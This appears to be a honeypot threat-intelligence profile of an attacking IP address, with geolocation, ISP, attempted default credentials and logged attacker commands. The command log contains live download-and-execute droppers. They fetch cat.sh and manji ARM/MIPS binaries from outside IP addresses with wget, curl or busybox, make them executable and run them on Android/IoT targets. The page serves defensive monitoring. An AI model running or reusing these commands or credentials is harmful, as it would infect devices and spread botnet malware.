TROYANOSYVIRUS
Aktive BedrohungHOCH

176.65.139.41

Herkunftsland🇩🇪 Alemania
Erste Erkennung15.2.2026
Letzte Aktivitat25.2.2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
231
Gesamtangriffe
🔌
3
Ports
📡
3
Angriffsarten
🦠
1
Malware

Geolokalisierung

Land
🇩🇪 Alemania
Stadt
Unbekannt
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Angriffsarten

cowrie
honeyaml
adbhoney

Angegriffene Ports

23805555

Zugehorige Malware

8a6ec7b5e46a3a9e5ee8...

Versuchte Anmeldedaten

🔐root/admin
5x
🔐root/password
1x
🔐hikvision/hikvision
1x

Ausgefuhrte Befehle

$echo hello26x
$cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android11x
$cd /data/local/tmp/; wget http://130.12.180.78/manji.arm7 -O manji.arm7 || busybox wget http://130.12.180.78/manji.arm7 -O manji.arm7; chmod 777 manji.arm7; ./manji.arm7 || wget http://130.12.180.78/manji.mips -O manji.mips || busybox wget http://130.12.180.78/manji.mips -O manji.mips; chmod 777 manji.mips; ./manji.mips5x
$./2x
$/bin/busybox TEST1x
$cd /data/local/tmp/; busybox wget http://140.233.190.82/cat.sh; sh cat.sh; curl http://140.233.190.82/cat.sh; sh cat.sh; wget http://140.233.190.82/cat.sh; sh cat.sh; curl http://140.233.190.82/cat.sh; sh cat.sh; busybox wget http://140.233.190.82/cat.sh; sh cat.sh; busybox curl http://140.233.190.82/cat.sh; sh cat.sh1x
$echo SHELL_TEST1x
$cat /proc1x

Risikobewertung

70
/100
NiedrigMittelHochKritisch